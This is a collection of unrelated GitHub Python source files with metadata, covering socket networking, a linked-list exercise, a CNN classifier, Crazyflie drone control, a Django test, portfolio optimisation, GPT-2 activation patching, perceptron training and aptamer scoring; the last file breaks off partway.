+{"seq_id":"14887037316","text":"import socket\nimport time\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect(('localhost', 1234))\n\nfor i in range(2):\n s.send(bytes(\"open\", \"utf-8\"))\n msg = s.recv(1024)\n print(msg.decode(\"utf-8\"))\n # decimal_list = list(msg)\n # binary_list = [bin(decimal)[2:].zfill(8) for decimal in decimal_list]\n # bits_string = ' '.join(binary_list)\n # print(bits_string)\n # time.sleep(1)\n\ns.send(bytes(\"close\", \"utf-8\"))\ns.close()\nprint('Connection closed.')\n","repo_name":"kunal-mod/networking","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"6698252164","text":"from copy import deepcopy\nfrom _utils import SingleLinkedList\n\n# Runtime: O(n)\n# Memory: O(1)\ndef partition(head, value):\n initial_tail = head.tail()\n current_tail = initial_tail\n current = head\n prev = None\n while current != initial_tail:\n node = current\n current = node.next\n if node.value >= value:\n if prev:\n prev.next = node.next\n else:\n # If there was no prev the head changed\n head = node.next\n current_tail.next = node\n node.next = None\n current_tail = node\n else:\n prev = node\n return head\n\nif __name__ == '__main__':\n head = SingleLinkedList(3)\n node = head\n for x in [5, 8, 5, 10, 2, 1]:\n node.next = SingleLinkedList(x)\n node = node.next\n head2 = deepcopy(head)\n\n print('INITIAL\\t\\t', head)\n print('PARTITION\\t', partition(head, 5))\n print('INITIAL\\t\\t', head2)\n print('PARTITION\\t', partition(head2, 3))\n","repo_name":"sebamenabar/CTCI-Python-Solutions","sub_path":"2.4 - Partition.py","file_name":"2.4 - Partition.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"70142531716","text":"import pandas as pd\nimport numpy as np\nimport sys\nimport scipy\nimport keras\nfrom keras.utils import to_categorical\nfrom keras.models import Sequential,Input,Model\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers.advanced_activations import LeakyReLU\n\n\n#-------------------------data processing-------------------------------------\nx_train = pd.read_csv(sys.argv[1], header = None).values\nx_test = pd.read_csv(sys.argv[2], header = None).values\ny_train = np.asarray(list(x_train[:,0]))\nx_train = x_train[:,1:]\nx_test = x_test[:,1:]\ntrain_data = list()\ntest_data = list()\nfor i in range(len(x_train)):\n train_data.append(x_train[i].reshape(32,32))\nfor i in range(len(x_test)):\n test_data.append(x_test[i].reshape(32, 32))\ntrain_data = np.asarray(train_data)\ntest_data = np.asarray(test_data)\nclasses = np.unique(y_train)\nnClasses = len(y_train)\ntrain_data = train_data.reshape(-1,32,32,1)\ntest_data = test_data.reshape(-1,32,32,1)\ntrain_data = train_data.astype('float32')\ntest_data = test_data.astype('float32')\ntrain_data = train_data / 255.\ntest_data = test_data / 255.\ny_train_one_hot = to_categorical(y_train)\n\n#----------------------modelling the data-------------------------------------------\nbatchsize = 100\nepochs = 21\nnum_classes = 46\n\n#--------------------------architecture-------------------------------\nmodel = Sequential()\nmodel.add(Conv2D(32, kernel_size=(3, 3),input_shape=(32,32,1),padding='same'))\nmodel.add(LeakyReLU(alpha=0.1))\nmodel.add(MaxPooling2D((2, 2),padding='same'))\nmodel.add(Conv2D(64, (3, 3),padding='same'))\nmodel.add(LeakyReLU(alpha=0.1))\nmodel.add(MaxPooling2D(pool_size=(2, 2),padding='same'))\nmodel.add(Conv2D(128, (3, 3),padding='same'))\nmodel.add(LeakyReLU(alpha=0.1))\nmodel.add(MaxPooling2D(pool_size=(2, 2),padding='same'))\nmodel.add(Flatten())\nmodel.add(Dense(256, activation='tanh'))\nmodel.add(Dense(128,activation='tanh'))\n#model.add(LeakyReLU(alpha=0.1))\nmodel.add(Dense(num_classes, activation='softmax'))\n\n#----------------------------compiling the model---------------------------------\nmodel.compile(loss=keras.losses.categorical_crossentropy, optimizer=keras.optimizers.Adam(),metrics=['accuracy'])\n#model.summary()\n\n\n#----------------------------------training the model------------------------------\nmodel_train = model.fit(train_data,y_train_one_hot,batch_size=batchsize,epochs=epochs)\n\npredictions = model.predict_classes(test_data,batch_size=10)\nnp.savetxt(sys.argv[3],predictions)","repo_name":"Maestro100/Machine-Learning","sub_path":"Devanagri handwritten recognition using CNN and Kaggle TGS salt challenge/CNN/cnna.py","file_name":"cnna.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"10507114695","text":"import os\nimport sys\n\nimport cflib.crtp\nfrom PyQt5.QtWidgets import QApplication, QWidget, QHBoxLayout, QPushButton\nfrom cflib.crazyflie import Crazyflie\nfrom cflib.crazyflie.log import LogConfig\nfrom cflib.positioning.motion_commander import MotionCommander\nfrom cflib.utils.multiranger import Multiranger\n\nfrom drone import Drone\n\ncflib.crtp.init_drivers(enable_debug_driver=False)\n\n\ndef find_available_drones():\n return cflib.crtp.scan_interfaces()\n\n\nclass CrazyDrone(Drone):\n\n def __init__(self, link_uri):\n super().__init__()\n\n cache = \"./cache\"\n if getattr(sys, 'frozen', False):\n cache = sys._MEIPASS + os.path.sep + \"cache\"\n\n self._cf = Crazyflie(rw_cache=cache)\n self.motion_commander = None\n self.multiranger = None\n\n # maximum speeds\n self.max_vert_speed = 1\n self.max_horiz_speed = 1\n self.max_rotation_speed = 90\n\n self.logger = None\n\n # Connect some callbacks from the Crazyflie API\n self._cf.connected.add_callback(self._connected)\n self._cf.disconnected.add_callback(self._disconnected)\n self._cf.connection_failed.add_callback(self._connection_failed)\n self._cf.connection_lost.add_callback(self._connection_lost)\n\n print('Connecting to %s' % link_uri)\n\n # Try to connect to the Crazyflie\n self._cf.open_link(link_uri)\n\n # Variable used to keep main loop occupied until disconnect\n self.is_connected = True\n\n def init(self):\n pass\n\n def _connected(self, link_uri):\n \"\"\" This callback is called form the Crazyflie API when a Crazyflie\n has been connected and the TOCs have been downloaded.\"\"\"\n print('Connected to %s' % link_uri)\n\n self.connection.emit(\"progress\")\n\n # The definition of the logconfig can be made before connecting\n self.logger = LogConfig(\"Battery\", 1000) # delay\n self.logger.add_variable(\"pm.vbat\", \"float\")\n\n try:\n self._cf.log.add_config(self.logger)\n self.logger.data_received_cb.add_callback(lambda e, f, g: self.batteryValue.emit(float(f['pm.vbat'])))\n # self.logger.error_cb.add_callback(lambda: print('error'))\n self.logger.start()\n except KeyError as e:\n print(e)\n\n self.connection.emit(\"on\")\n self.motion_commander = MotionCommander(self._cf, 0.5)\n self.multiranger = Multiranger(self._cf, rate_ms=50)\n self.multiranger.start()\n\n def _connection_failed(self, link_uri, msg):\n \"\"\"Callback when connection initial connection fails (i.e no Crazyflie\n at the speficied address)\"\"\"\n print('Connection to %s failed: %s' % (link_uri, msg))\n self.is_connected = False\n self.connection.emit(\"off\")\n\n def _connection_lost(self, link_uri, msg):\n \"\"\"Callback when disconnected after a connection has been made (i.e\n Crazyflie moves out of range)\"\"\"\n print('Connection to %s lost: %s' % (link_uri, msg))\n self.connection.emit(\"off\")\n\n def _disconnected(self, link_uri):\n \"\"\"Callback when the Crazyflie is disconnected (called in all cases)\"\"\"\n print('Disconnected from %s' % link_uri)\n self.is_connected = False\n self.connection.emit(\"off\")\n\n def take_off(self):\n if self._cf.is_connected() and self.motion_commander and not self.motion_commander._is_flying:\n self.motion_commander.take_off()\n self.is_flying_signal.emit(True)\n\n def land(self):\n if self._cf.is_connected() and self.motion_commander and self.motion_commander._is_flying:\n self.motion_commander.land()\n self.is_flying_signal.emit(False)\n\n def stop(self):\n if not (self.logger is None):\n self.logger.stop()\n if self.motion_commander:\n self.motion_commander.land()\n if 
self.multiranger:\n self.multiranger.stop()\n self._cf.close_link()\n\n def is_flying(self):\n if self._cf.is_connected() and self.motion_commander:\n return self.motion_commander._is_flying\n\n return False\n\n def process_motion(self, _up, _rotate, _front, _right):\n if self.motion_commander:\n\n # WARNING FOR CRAZYFLY\n # positive X is forward, # positive Y is left # positive Z is up\n\n velocity_z = _up * self.max_vert_speed\n velocity_yaw = _rotate * self.max_rotation_speed\n velocity_x = _front * self.max_horiz_speed\n velocity_y = - _right * self.max_horiz_speed\n # print(\"PRE\", velocity_x, velocity_y, velocity_z, velocity_yaw)\n\n # print(\"POST\", velocity_x, velocity_y, velocity_z, velocity_yaw)\n if self.motion_commander._is_flying:\n self.motion_commander._set_vel_setpoint(velocity_x, velocity_y, velocity_z, velocity_yaw)\n\n\nif __name__ == \"__main__\":\n app = QApplication([])\n\n available = find_available_drones()\n print(str(available[0][0]))\n print('availables crazyflies', str(available))\n\n if len(available) > 0:\n drone = CrazyDrone(available[0][0])\n\n start_button = QPushButton(\"take off\")\n stp_button = QPushButton(\"Land\")\n start_button.clicked.connect(drone.take_off)\n stp_button.clicked.connect(drone.land)\n widget = QWidget()\n layout = QHBoxLayout()\n widget.setLayout(layout)\n layout.addWidget(start_button)\n layout.addWidget(stp_button)\n drone.batteryValue.connect(lambda status: print('batt', status))\n drone.is_flying_signal.connect(lambda status: print('flying?', status))\n drone.connection.connect(lambda status: print('connection', status))\n drone.init()\n\n widget.show()\n sys.exit(app.exec_())\n drone.stop()","repo_name":"jeremie-garcia/dronible","sub_path":"code/crazydrone.py","file_name":"crazydrone.py","file_ext":"py","file_size_in_byte":5755,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"43737462096","text":"\"\"\"Tests for the ``cmsplugin_blog_language_publish`` app's template tags.\"\"\"\nfrom django.test import TestCase\n\nfrom cmsplugin_blog.models import Entry\n\nfrom ..templatetags.cmsplugin_blog_language_publish_tags import (\n get_published_entries)\nfrom .factories import EntryLanguagePublishFactory\n\n\nclass GetPublishedEntryTestCase(TestCase):\n \"\"\"Test for the ``get_published_entry`` template tag.\"\"\"\n longMessage = True\n\n def setUp(self):\n self.entry_langpub = EntryLanguagePublishFactory(published=True)\n self.entry_not_published = EntryLanguagePublishFactory()\n\n def test_template_tag(self):\n \"\"\"Test for the ``get_published_entry`` template tag.\"\"\"\n entries = Entry.objects.all()\n entries = get_published_entries(entries, 'en')\n self.assertEqual(len(entries), 1, msg=(\n 'Should return the entries that are published.'))\n","repo_name":"bitlabstudio/cmsplugin-blog-language-publish","sub_path":"cmsplugin_blog_language_publish/tests/cmsplugin_blog_language_publish_tags_tests.py","file_name":"cmsplugin_blog_language_publish_tags_tests.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"30494481743","text":"import cvxpy as cvx\nimport numpy as np\n\n\ndef cov_to_cor(covariances):\n \"\"\"\n :param covariances: a 2d numpy array of covariances\n :return: a 2d numpy array of correlations\n \"\"\"\n correlations = np.zeros(covariances.shape, dtype=np.float64)\n for i in range(covariances.shape[0]):\n for j in range(covariances.shape[1]):\n correlations[i, j] = covariances[i, j] / (covariances[i, i] * covariances[j, j])\n\n return correlations\n\n\ndef md_mvo(corr, card):\n '''\n :param card: The number of assets to be chosen (not including the rf asset (integer)\n :param corr: The nxn correlation matrix (np.array)\n '''\n n = len(corr[:, 0])\n z = cvx.Variable((n, n), boolean=True)\n y = cvx.Variable(n, boolean=True)\n cons = []\n for i in range(n):\n for j in range(n):\n cons.append(z[i][j] <= y[i])\n cons.append(cvx.sum(z[:, i]) == 1)\n\n cons.append(cvx.sum(y, axis=0) == card)\n obj = cvx.Maximize(cvx.sum(corr * z))\n prob = cvx.Problem(obj, cons)\n prob.solve()\n buckets = np.round(y.value)\n return buckets\n","repo_name":"HiImKarl/Capstone","sub_path":"business_logic/md_mvo.py","file_name":"md_mvo.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"}
+{"seq_id":"6405079827","text":"import sys\r\nimport numpy as np\r\nimport torch\r\nfrom torch.nn.functional import log_softmax\r\nfrom transformers import GPT2Tokenizer, GPT2LMHeadModel\r\nimport pandas as pd\r\nfrom tqdm import tqdm\r\n\r\nmodel_dir = '/home/leiyu/scratch/cma_hallucination/models/gpt2-xl/'\r\ndata_dir = '/home/leiyu/scratch/cma_hallucination/data/'\r\n\r\ntorch.set_grad_enabled(False)\r\nnum_layers = 48\r\nmodel_hidden_dim = 1600\r\nn_intervene = 10\r\nn_hall_sample = 1000\r\nmodule_kinds = ['res', 'attn', 'mlp']\r\n\r\n\r\ndef untuple(x):\r\n return x[0] if isinstance(x, tuple) else x\r\n\r\n\r\ndef get_key_pos_effects(effects, row):\r\n # effects: (n_layer, seq_len)\r\n effects_subj_first = effects[:, row['cue entity start idx']]\r\n if row['cue entity end idx'] > row['cue entity start idx'] + 1:\r\n effects_subj_mid = effects[:, 1 + row['cue entity start idx']:row['cue entity end idx']].mean(-1)\r\n else:\r\n effects_subj_mid = effects_subj_first\r\n effects_subj_last = effects[:, row['cue entity end idx']]\r\n\r\n effects_first_after = effects[:, 1 + row['cue entity end idx']]\r\n effects_further = effects[:, 1 + row['cue entity end idx']:-1].mean(-1)\r\n effects_last = effects[:, -1]\r\n\r\n igs_key_pos = torch.stack([\r\n effects_subj_first, effects_subj_mid, effects_subj_last, effects_first_after, effects_further, effects_last\r\n ], -1)\r\n\r\n return igs_key_pos # (n_layer, 6)\r\n\r\n\r\ndef run_get_noise_and_te(model, tokenizer, prompt, true_obj_id, hall_obj_id,\r\n subj_start, subj_end,\r\n batch_size=100, intervene_ent='subj'):\r\n batch_inputs = tokenizer(\r\n [prompt] * (1 + batch_size), return_tensors='pt'\r\n )['input_ids'].to(model.device)\r\n\r\n def make_wte_noise_hook(noise, intervene_start, intervene_end):\r\n\r\n def wte_noise_hook(module, inputs, outputs):\r\n outputs_0 = untuple(outputs)\r\n outputs_0[1:, intervene_start:intervene_end] += noise.to(outputs_0.device)\r\n return outputs\r\n\r\n return wte_noise_hook\r\n\r\n if intervene_ent == 'subj':\r\n intervene_start, intervene_end = subj_start, subj_end + 1\r\n else:\r\n intervene_start, intervene_end = subj_end + 1, batch_inputs.shape[1] - 1\r\n\r\n noise = torch.randn(batch_size, 1, model_hidden_dim)\r\n emb_hook = model.transformer.wte.register_forward_hook(\r\n make_wte_noise_hook(noise, intervene_start, intervene_end)\r\n )\r\n with torch.no_grad():\r\n logits = model(batch_inputs.to(model.device)).logits[:, -1] # (B, vocab_size)\r\n obj_logit_diffs = (logits[:, hall_obj_id] - logits[:, true_obj_id]).cpu()\r\n\r\n valid_batch_idx = (obj_logit_diffs[1:] < obj_logit_diffs[0]).nonzero(as_tuple=True)[0]\r\n # print('valid_batch_idx: ', valid_batch_idx)\r\n n_valid_noise = len(valid_batch_idx)\r\n valid_noise_rate = float(n_valid_noise) / batch_size\r\n\r\n if 1 < len(valid_batch_idx) < n_intervene:\r\n valid_batch_idx = torch.cat([\r\n valid_batch_idx, valid_batch_idx[-1].repeat(n_intervene - len(valid_batch_idx))\r\n ])\r\n elif len(valid_batch_idx) > n_intervene:\r\n valid_batch_idx = valid_batch_idx[:n_intervene]\r\n else:\r\n valid_batch_idx = torch.arange(n_intervene)\r\n\r\n if len(valid_batch_idx) != n_intervene:\r\n print(len(valid_batch_idx))\r\n\r\n emb_noises = noise[valid_batch_idx]\r\n TEs = obj_logit_diffs[1:][valid_batch_idx] - obj_logit_diffs[0]\r\n\r\n emb_hook.remove()\r\n torch.cuda.empty_cache()\r\n\r\n return emb_noises, TEs, obj_logit_diffs[0], valid_noise_rate\r\n\r\n\r\ndef run_with_activation_patch(model, batch_inputs, batch_noise,\r\n intervene_start, 
intervene_end,\r\n true_obj_id, hall_obj_id,\r\n patch_layer_idx, patch_seq_idx,\r\n module_kind='res'):\r\n hooks = []\r\n\r\n def make_wte_noise_hook(noise, intervene_start, intervene_end):\r\n\r\n def wte_noise_hook(module, inputs, outputs):\r\n outputs_0 = untuple(outputs)\r\n outputs_0[1:, intervene_start:intervene_end] += noise.to(outputs_0.device).unsqueeze(0)\r\n return outputs\r\n\r\n return wte_noise_hook\r\n\r\n emb_hook = model.transformer.wte.register_forward_hook(\r\n make_wte_noise_hook(batch_noise, intervene_start, intervene_end)\r\n )\r\n hooks.append(emb_hook)\r\n\r\n # Define the model-patching hook for computing the indirect effects\r\n for i in range(len(patch_layer_idx)):\r\n\r\n def make_patching_hook(patched_batch_id, patched_seq_id):\r\n def patching_hook(module, inputs, outputs):\r\n outputs_0 = untuple(outputs) # (B, seq_len, hidden_dim)\r\n outputs_0[patched_batch_id, patched_seq_id] = outputs_0[0, patched_seq_id]\r\n\r\n return outputs\r\n\r\n return patching_hook\r\n\r\n if module_kind == 'res':\r\n hook_i = model.transformer.h[patch_layer_idx[i]].register_forward_hook(\r\n make_patching_hook(i + 2, patch_seq_idx[i]))\r\n hooks.append(hook_i)\r\n elif module_kind == 'attn':\r\n patch_layer_start = max(0, patch_layer_idx[i] - 5)\r\n patch_layer_end = min(patch_layer_idx[i] + 5, num_layers)\r\n for j in range(patch_layer_start, patch_layer_end):\r\n hook_ij = model.transformer.h[j].attn.register_forward_hook(\r\n make_patching_hook(i + 2, patch_seq_idx[i]))\r\n hooks.append(hook_ij)\r\n elif module_kind == 'mlp':\r\n patch_layer_start = max(0, patch_layer_idx[i] - 5)\r\n patch_layer_end = min(patch_layer_idx[i] + 5, num_layers)\r\n for j in range(patch_layer_start, patch_layer_end):\r\n hook_ij = model.transformer.h[j].mlp.register_forward_hook(\r\n make_patching_hook(i + 2, patch_seq_idx[i]))\r\n hooks.append(hook_ij)\r\n else:\r\n raise ValueError('Invalid patching module kind')\r\n\r\n # With the patching rules defined, run the patched model in inference.\r\n with torch.no_grad():\r\n batch_log_probs = log_softmax(model(batch_inputs).logits[:, -1], -1).cpu() # (B, vocab_size)\r\n for hook in hooks:\r\n hook.remove()\r\n torch.cuda.empty_cache()\r\n\r\n log_prob_diffs = batch_log_probs[:, hall_obj_id] - batch_log_probs[:, true_obj_id]\r\n\r\n return log_prob_diffs[2:] - log_prob_diffs[1]\r\n\r\n\r\ndef main(module_kind):\r\n device = torch.device('cuda')\r\n model = GPT2LMHeadModel.from_pretrained(model_dir).to(device)\r\n model.eval()\r\n\r\n tokenizer = GPT2Tokenizer.from_pretrained(model_dir)\r\n tokenizer.pad_token = tokenizer.eos_token\r\n pararel_df = pd.read_csv(data_dir + 'dataframes/pararel_questions.csv')\r\n\r\n # sampled_hall_idx = np.load(data_dir + 'results/pararel_sampled_hall_idx_act.npy')\r\n sampled_hall_idx = pararel_df.loc[\r\n pararel_df['is hallucination'] == 1\r\n ].sample(n_hall_sample).index\r\n pararel_hall_df = pararel_df.iloc[sampled_hall_idx].reset_index(drop=True)\r\n np.save(data_dir + 'results/pararel_sampled_hall_idx_act_{}.npy'.format(module_kind), np.array(sampled_hall_idx))\r\n\r\n results = {\r\n 'TE': [], 'IE': [],\r\n 'y_0': [], 'noise': []\r\n }\r\n valid_noise_rate = []\r\n for i, row in tqdm(pararel_hall_df.iterrows(), total=pararel_hall_df.shape[0]):\r\n seq_len = len(tokenizer(row['prompt'])['input_ids'])\r\n true_obj_id, hall_obj_id = row['true object first token id'], row['predicted object first token id']\r\n subj_start, subj_end = row['cue entity start idx'], row['cue entity end idx']\r\n batch_size = seq_len * 
num_layers + 2\r\n batch_inputs = tokenizer(\r\n [row['prompt']] * batch_size, return_tensors='pt'\r\n )['input_ids'].to(device)\r\n\r\n noise_i, TE, y_0, val_noise_r = run_get_noise_and_te(\r\n model, tokenizer, row['prompt'], true_obj_id, hall_obj_id,\r\n subj_start, subj_end, intervene_ent='subj')\r\n\r\n results['y_0'].append(y_0) # (1,)\r\n results['TE'].append(TE.mean()) # (1,)\r\n results['noise'].append(noise_i) # (n_intervene, 1, 1600)\r\n valid_noise_rate.append(val_noise_r)\r\n\r\n patch_layer_idx = torch.arange(num_layers).repeat_interleave(seq_len)\r\n patch_seq_idx = torch.arange(seq_len).repeat(num_layers)\r\n\r\n IEs = []\r\n for j in range(n_intervene):\r\n IEs_ij = run_with_activation_patch(\r\n model, batch_inputs, noise_i[j],\r\n subj_start, subj_end+1,\r\n true_obj_id, hall_obj_id,\r\n patch_layer_idx, patch_seq_idx,\r\n module_kind=module_kind\r\n )\r\n torch.cuda.empty_cache()\r\n\r\n key_pos_IEs = get_key_pos_effects(IEs_ij.view(num_layers, seq_len), row)\r\n IEs.append(key_pos_IEs) # (num_layer, 6)\r\n\r\n results['IE'].append(torch.stack(IEs).mean(0))\r\n\r\n for k, v in results.items():\r\n torch.save(\r\n torch.stack(v), data_dir + 'results/pararel/{}_{}_loc.pt'.format(k, module_kind)\r\n )\r\n\r\n np.save(data_dir + 'results/pararel/valid_noise_rate_{}_loc.npy'.format(module_kind), valid_noise_rate)\r\n\r\n\r\nif __name__ == '__main__':\r\n module_kind = module_kinds[int(sys.argv[1])]\r\n main(module_kind)\r\n # python activation_patching.py 0/1/2\r\n # 0/1/2 for computing IEs of token/attn/mlp hidden states respectively\r\n # each run will return an indirect effect tensor of shape (1000, 48, 6) named \"IE_module-kind_loc.pt\"\r\n","repo_name":"jadeleiyu/hallucination_mech_evol","sub_path":"src/hall_mech/cpi.py","file_name":"cpi.py","file_ext":"py","file_size_in_byte":9509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"14948011541","text":"# Модуль получения нейросетевой модели БФ, используя логистическую ФА (сигмоидальную).\n# И нахождения наименьшее, возможное для обучения, количество векторов.\n\n\nfrom DataIO import *\nfrom neuronal import *\nfrom Graphic import *\nimport itertools\n\n# Функция записывает в файл процесс обучения \n# Hа минимально возможном количестве векторов\ndef write_min(combination, outputFile, W, kind):\n # запишем в файл найденные значения\n file = open(outputFile, 'w')\n file.write('set:\\n')\n for i,x in enumerate(combination[1]):\n file.write('X(' + str(i+1) + ') = (' + str(x[0])[4:-1] + ')')\n file.write('\\n')\n file.write('\\n')\n\n nu = 0.3 # норма обучения\n E = 1 # необходимо для начала цикла прохода по эпохам\n k = 0 # необходимо для начала отсчёта эпох\n\n arrayE = list() # список всех суммарнах квадратичных ошибок\n arrayK = list() # список всех эпох\n\n Y = list() # вектор для хранения полученного реального выхода текущей эпохи\n\n F = [i[1] for i in combination[1]] # вектор значений БФ, на котром происходит обучение\n\n #Обучение до тех пор, пока квадратичная ошибка не будет = 0\n while E != 0:\n #Записываем последние полученные весовые коэффициенты на случай получения нулевой ошибки\n prev_W = list(W)\n\n #Проверка на достижение нулевой ошибки на последних найденных весовых коэффициентах\n for (x, f) in combination[1]:\n # 1)Подесчет net\n n = net(W, x)\n\n # 2)Реальный выход\n y = actual_NN(n)\n Y.append(y)\n\n # 3)Ошибку дельта\n d = delta(f, y)\n\n # 5)Подсчет сумарной квадратичной ошибки\n E = totalError(Y, F)\n\n #Запись полученных данные в файл\n write_Data(file, k, Y, prev_W, E)\n\n Y = list() #Очистка вектора от полученных данных\n\n # Если ошибка(Е) != 0 выполняется перерасчёт весовых коэффициентов\n if E != 0:\n\n for (x,f) in combination[1]:\n n = net(W, x)\n y = actual_NN(n)\n d = delta(f, y)\n\n #Пересчеи W(Синаптические вес)\n W = recount_W(W, x, d, n, nu, kind)\n\n #Добавление номера текущей эпохи и найденную в ней среднеквадратичную ошибку\n arrayK.append(k)\n arrayE.append(E)\n \n k += 1#Увеличивание количество эпох +1\n\n #Построение графиа зависимости среднеквадратичной ошибки от эпохи\n drawGraph(arrayE, arrayK, kind, outputFile)\n\n\n#Функция проверяется комбинация на \"обучаемость\"\n#W: входные значения весовых коэффициентов\n#combination: найденная наилучшая комбинация векторов\n#kind: вид ФА threshold - пороговая, logistics - логистическая\n#В случае успеха возвращается W, k(эпоха), иначе W, 0\ndef check_combination(W, combination, kind):\n nu = 0.3 #норма\n E = 1 #Ср^2 ошибка\n k = 0 #Эпох\n\n Y = list() #Вектор для хранения полученного реального выхода текущей эпохи\n\n #Обучение до достигжения ошибок = 0, если это возможно\n #Для этого в качестве \"порога\" поиска берется ограниченное число эпох для обучения\n epochs = 200\n while E != 0 and k < epochs:\n e = 0 #Переменная для поиска ошибок при обучении\n\n # запоминаем последние полученные весовые коэффициенты на случай получения нулевой ошибки\n prev_W = list(W)\n\n # проверим выходной вектор на наличие ошибок\n for (x, f) in combination:\n n = net(W, x)\n y = actual_NN(n)\n d = delta(f, y)\n\n #Если имеется ошибкв, прибавим её к переменной для отслеживания ошибок обучения\n if d != 0:\n e += 1\n\n #В случае ошибки выходного вектора\n if e != 0:\n e = 0\n #Обучение на выборке\n for (x,f) in combination:\n n = net(W, x)\n y = actual_NN(n)\n d = delta(f, y)\n\n if d != 0:\n e += 1 # ошибка для обучения на векторе\n\n # 4) пересчитываем W\n W = recount_W(W, x, d, n, nu, kind 
= kind)\n E = e \n k += 1 #Следующей эпохе +1\n\n if k < epochs:\n return W, k\n else:\n return W, 0\n\n\n#Функция поиска минимального вектора для обучения\n#inputW: входные значения весовых коэффициентов\n#inputF: значения БФ\n#X: вектор с значениями от 0 до 16 в двоичном представлении\n#outputFile: имя файла записи\n#kind: вид ФА threshold - пороговая, logistics - логистическая\ndef education_AF(inputW, F, X, outputFile, kind):\n for i in range(2**4, 2, -1):\n #Генерация комбинаций векторов различных длин\n combinations = list(itertools.combinations(zip(X, F), i))\n\n arrayKN = list()\n\n #Проверка каждой комбинации\n for combination in combinations:\n\n Y = list()\n\n W, k = check_combination(list(inputW), combination, kind)\n\n if k != -1:\n\n #Проверка успешности обучения\n for (x, f) in zip(X, F):\n n = net(W, x)\n y = actual_NN(n)\n Y.append(y)\n\n # 5)Подсчет суммарной квадратичной ошибки\n E = totalError(Y, F)\n\n #Запись найденных векторов, кол-во эпох обучения и набор весов\n if E == 0:\n arrayKN.append((k, combination, W))\n best_combination = sorted(arrayKN, key = lambda education: education[0])[0]\n\n #Запись в файл минимальный набор с минимальным количеством эпох\n write_min(best_combination, outputFile, list(inputW), kind)\n","repo_name":"SaintShrimps/SimpleOneLayrNN","sub_path":"searchMinV.py","file_name":"searchMinV.py","file_ext":"py","file_size_in_byte":7623,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"33449269266","text":"import numpy as np\r\nimport random\r\nimport tkinter as tk\r\n\r\nclass interaction_approximator():\r\n \"\"\"\r\n\r\n This class is designed to hold all functions designed to develop predictions of ssDNA aptamer sequences.\r\n\r\n \"\"\"\r\n\r\n def __init__(self):\r\n\r\n \"\"\"\r\n One dictionary hold data pertaining to bond probability and hydrogen bonding.\r\n Each amino acid is referenced by one-letter code, existing as keys.\r\n As values, data pertaining to each nucleotide in relation to the given amino.\r\n\r\n This dictionary holds the probability data in respect to bonds which may occur:\r\n the first value is the one letter nucleotide code used to develop a predicted string,\r\n the second element is the pseudopairing probability and quantity,\r\n the third element is the hydrogen bond probability and quantity.\r\n\r\n \"\"\"\r\n\r\n self.peptide_collection_text_box = ''\r\n\r\n # the value is in units of kcal/mol\r\n self.hydrogen_bond_strength = 0.0000000001\r\n\r\n # Each dictionary holds the probability data in respect to hydrogen bonds which may occur\r\n # the first value is the one letter nucleotide code used to develop a predicted string\r\n # the second element is the pseudopairing probability and quantity\r\n # the third element is the hydrogen bond probability and quantity\r\n\r\n # this dictionary is a dictionary of dictionaries -- the first key is a one letter amino\r\n # acid code -- the second key is a nucleotide which allows access to probability associated values\r\n self.association_probability_amino_to_nucleotide_dict_dict = {\r\n 'S': {'A': ((1, 0.4), (6, 2.3)), 'G': ((0, 0), (1, 0.4)), 'C': ((0, 0), (3, 12.5))},\r\n 'N': {'A': ((10, 3.8), (4, 1.5)), 'G': ((0, 0), (1, 1.2)), 'C': ((1, 4.2), (0, 0)), 'T': ((2, 8.3), (2, 8.3))},\r\n 'Q': {'A': ((2, 0.8), (4, 1.5)), 'G': ((0, 0), (2, 2.4)), 'T': ((4, 16.7), (1, 4.2))},\r\n 'D': {'A': ((7, 2.6), (10, 3.8)), 'G': ((28, 34.1), (2, 2.4)), 'T': ((0, 0), (1, 4.2))},\r\n 'E': {'A': ((1, 0.4), (3, 1.1)), 'G': ((2, 2.4), (7, 8.5)), 'T': ((0, 0), (1, 4.2))},\r\n 'K': {'T': ((0, 0), (1, 4.2))},\r\n 'T': {'C': ((1, 4.2), (0, 0))},\r\n 'R': {'C': ((3, 12.5), (0, 0))}\r\n }\r\n\r\n # this dictionary holds data related to each nucleotide\r\n self.association_probability_nucleotide_to_amino_dict_dict = {\r\n 'A': {'S': ((1, 0.4), (6, 2.3)), 'N': ((10, 3.8), (4, 1.5)), 'Q': ((2, 0.8), (4, 1.5)), 'D': ((7, 2.6), (10, 3.8)),\r\n 'E': ((1, 0.4), (3, 1.1))},\r\n 'G': {'S': ((0, 0), (1, 0.4)), 'N': ((0, 0), (1, 1.2)), 'Q': ((0, 0), (2, 2.4)), 'D': ((28, 34.1), (2, 2.4)), 'E': ((2, 2.4), (7, 8.5))},\r\n 'C': {'S': ((0, 0), (3, 12.5)), 'N': ((1, 4.2), (0, 0)), 'T': ((1, 4.2), (0, 0)), 'R': ((3, 12.5), (0, 0))},\r\n 'T': {'N': ((2, 8.3), (2, 8.3)), 'Q': ((4, 16.7), (1, 4.2)), 'D': ((0, 0), (1, 4.2)), 'E': ((0, 0), (1, 4.2)), 'K': ((0, 0), (1, 4.2))}\r\n }\r\n\r\n # the primer sequences must be scored to aid in reducing false positives and obfuscating results.\r\n # will be used to develop a minimum score to test sequences against for study validity\r\n self.null_pseudopair_strength_and_peptide_fragment = (0, '')\r\n self.p5 = \"TCGTCGGCAGCGTCAGATGTGTATAAGAGACAG\"\r\n 